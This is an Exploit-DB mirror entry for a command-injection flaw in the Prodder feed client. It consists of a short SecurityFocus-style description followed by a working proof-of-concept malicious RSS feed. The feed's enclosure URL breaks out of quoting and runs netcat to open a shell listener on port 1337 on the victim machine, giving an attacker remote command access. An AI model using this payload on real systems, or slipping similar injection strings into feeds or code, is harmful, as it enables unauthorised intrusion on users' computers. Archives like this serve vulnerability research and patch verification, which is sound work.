exploit-db-mirror/exploits/linux/remote/27902.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

7 lines
No EOL
678 B
Text

source: https://www.securityfocus.com/bid/18068/info
Prodder is prone to an arbitrary command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary shell commands on the vulnerable computer in the context of the running application.
<?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xsl"?> <rss version="2.0"> <channel> <title>RedTeam Pentesting Example Malicious Server Feed</title> <item> <enclosure url="http://www.example.com/example.mp3'; nc -e /bin/sh -l -p 1337 & ';#'" length="241734" type="audio/mpeg" /> </item> </channel> </rss>